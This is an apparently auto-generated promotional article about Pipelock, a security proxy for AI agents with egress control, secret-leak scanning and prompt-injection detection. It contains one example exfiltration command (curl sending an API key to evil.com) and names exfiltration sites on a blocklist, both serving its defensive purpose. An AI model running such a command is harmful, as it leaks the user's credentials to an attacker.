luckyPipewrench/pipelock: Security harness for AI agents — egress proxy with DLP scanning, SSRF protection, MCP response scanning, and workspace integrity monitoring

Pipelock: The All-in-One Security Harness for AI Agents

In a world where AI agents are becoming increasingly autonomous, the need for robust security measures has never been more critical. Enter Pipelock, an innovative solution designed to protect AI agents from a myriad of threats. This all-in-one security harness is a game-changer, offering a single binary with zero dependencies that controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity.

Why Pipelock Matters

AI agents, such as Claude Code and OpenHands, are often granted shell access and API keys, making them potential targets for malicious actors. A compromised agent can exfiltrate secrets with just one HTTP request, as demonstrated by the following example:

bash
curl “https://evil.com/steal?key=$ANTHROPIC_API_KEY” # game over

Pipelock addresses this vulnerability by implementing capability separation. The agent process, which holds the secrets, is network-restricted, while a separate fetch proxy, which has no secrets, handles web browsing. Every request goes through a comprehensive 7-layer scanner pipeline, ensuring that your AI agents remain secure.

Key Features of Pipelock

1. Capability Separation: By separating the agent process from the fetch proxy, Pipelock ensures that even if an agent is compromised, the secrets remain safe.

2. 7-Layer Scanner Pipeline: The pipeline includes SSRF protection, blocklist, rate limiting, DLP (Data Loss Prevention), environment leak detection, entropy analysis, and URL length limits.

3. Prompt Injection Detection: Pipelock scans fetched content for prompt injection, system/role overrides, and jailbreak attempts, providing options to block, strip, warn, or ask for human intervention.

4. File Integrity Monitoring: SHA256 manifests detect modified, added, or removed files, ensuring the integrity of your workspace.

5. Git Protection: Pipelock offers git-aware security, including diff scanning, branch validation, and pre-push hooks.

6. MCP Proxy + Response Scanning: Wrap any MCP server as a stdio proxy, and Pipelock will scan every server response for prompt injection before returning it.

7. Audit Logging + Prometheus: Structured JSON audit logging and Prometheus metrics provide comprehensive visibility into your security posture.

How Pipelock Works

Pipelock operates by creating a privileged zone for the AI agent and a fetch zone for the proxy. The agent, which has API keys and credentials, is restricted to a limited network, while the fetch proxy, which has no secrets, can access the full internet. This separation ensures that even if the agent is compromised, the secrets remain secure.

The fetch proxy runs a 7-layer scanner pipeline on every request, including:

1. SSRF Protection: Blocks internal/private IPs with DNS rebinding prevention.
2. Domain Blocklist: Blocks known exfiltration targets like pastebin and transfer.sh.
3. Rate Limiting: Implements per-domain sliding window rate limiting.
4. DLP Patterns: Uses regex matching for API keys, tokens, and secrets.
5. Environment Variable Leak Detection: Detects the proxy’s own env var values in URLs.
6. Entropy Analysis: Flags encoded/encrypted data in URL segments.
7. URL Length Limits: Prevents unusually long URLs that suggest data exfiltration.

OWASP Agentic Top 10 Coverage

Pipelock provides strong coverage for the OWASP Agentic Top 10, including:

• ASI01 Prompt Injection: Strong response + MCP scanning.
• ASI03 Privilege Escalation: Strong capability separation + SSRF protection.
• ASI04 Insecure Output Handling: Strong response scanning with block/strip/warn actions.
• ASI09 Insufficient Logging: Strong structured JSON + Prometheus metrics.

Configuration and Deployment

Pipelock offers three modes: strict, balanced, and audit. The strict mode provides mathematical certainty, the balanced mode raises the bar from “one curl command” to “sophisticated pre-planned attack,” and the audit mode gives you visibility you don’t have today.

Installation is straightforward:

bash
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
pipelock generate config –preset balanced -o pipelock.yaml
pipelock run –config pipelock.yaml

Pipelock also supports Docker deployment:

bash
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro ghcr.io/luckypipewrench/pipelock:latest run –config /config/pipelock.yaml –listen 0.0.0.0:8888

Conclusion

Pipelock is a must-have tool for anyone running AI agents with shell access and API keys. Its comprehensive security features, ease of use, and robust coverage of the OWASP Agentic Top 10 make it an essential addition to your security toolkit. Whether you’re in a regulated industry or just want to ensure the safety of your AI agents, Pipelock has you covered.

Tags: AI security, Pipelock, AI agents, security harness, capability separation, prompt injection, file integrity, OWASP, MCP proxy, audit logging, Prometheus metrics.

Viral Phrases: “All-in-one security harness,” “capability separation,” “7-layer scanner pipeline,” “prompt injection detection,” “file integrity monitoring,” “OWASP Agentic Top 10 coverage,” “audit logging + Prometheus,” “AI agents security,” “network egress control,” “credential exfiltration detection.”

,